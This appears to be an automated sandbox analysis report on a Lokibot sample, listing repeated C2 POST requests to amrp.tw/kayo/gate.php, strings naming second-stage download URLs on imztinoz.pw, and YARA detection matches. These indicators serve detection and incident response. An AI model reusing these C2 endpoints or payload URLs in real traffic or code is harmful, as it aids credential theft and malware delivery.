                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 163Connection: close
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00404ED4 recv,5_2_00404ED4
                Source: unknownDNS traffic detected: queries for: amrp.tw
                Source: unknownHTTP traffic detected: POST /kayo/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amrp.twAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC7C64DAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Apr 2021 07:18:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/5.6.40Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: FJbeidnZOF.exe, 00000005.00000002.476800352.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://amrp.tw/kayo/gate.php
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: FJbeidnZOF.exeString found in binary or memory: http://imztinoz.pw/TM/v.txt
                Source: FJbeidnZOF.exeString found in binary or memory: http://imztinoz.pw/TM/v.txtShttp://www.imztinoz.pw/TM/TaskManager.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.238650996.0000000002521000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-u
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comr
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: FJbeidnZOF.exe, 00000001.00000003.220215711.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.220145165.00000000055F7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: FJbeidnZOF.exe, 00000001.00000003.219820600.00000000055F7000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: FJbeidnZOF.exe, 00000001.00000003.236778250.00000000055C6000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: FJbeidnZOF.exe, 00000001.00000003.210930152.00000000055E5000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.c
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: FJbeidnZOF.exe, 00000001.00000003.211196074.00000000055CB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn_
                Source: FJbeidnZOF.exe, 00000001.00000003.210756308.00000000055D9000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns
                Source: FJbeidnZOF.exe, 00000001.00000003.210887774.00000000055FC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnw-
                Source: FJbeidnZOF.exeString found in binary or memory: http://www.freewebs.com/tonysfiles
                Source: FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/W
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmp, FJbeidnZOF.exe, 00000001.00000003.222657946.00000000055F9000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: FJbeidnZOF.exe, FJbeidnZOF.exe, 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: FJbeidnZOF.exeString found in binary or memory: http://www.imztinoz.pw/TM/15.bat
                Source: FJbeidnZOF.exeString found in binary or memory: http://www.imztinoz.pw/TM/15.batKFile
                Source: FJbeidnZOF.exeString found in binary or memory: http://www.imztinoz.pw/TM/TaskManager.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
                Source: FJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/B
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                Source: FJbeidnZOF.exe, 00000001.00000003.215445328.00000000055D5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
                Source: FJbeidnZOF.exe, 00000001.00000003.214604743.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
                Source: FJbeidnZOF.exe, 00000001.00000003.215137041.00000000055CE000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comF
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comT
                Source: FJbeidnZOF.exe, 00000001.00000003.213191005.00000000055D7000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: FJbeidnZOF.exe, 00000001.00000002.249244048.00000000067D2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 1_2_009794A81_2_009794A8
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 1_2_0097C3A01_2_0097C3A0
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 1_2_0097A7581_2_0097A758
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_0040549C5_2_0040549C
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_004029D45_2_004029D4
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: String function: 00405B6F appears 42 times
                Source: FJbeidnZOF.exe, 00000001.00000002.239213057.0000000003730000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000001.00000000.207005847.00000000001C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exe, 00000005.00000000.235449734.00000000005E0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exeBinary or memory string: OriginalFilenameSoapServices.exe8 vs FJbeidnZOF.exe
                Source: FJbeidnZOF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
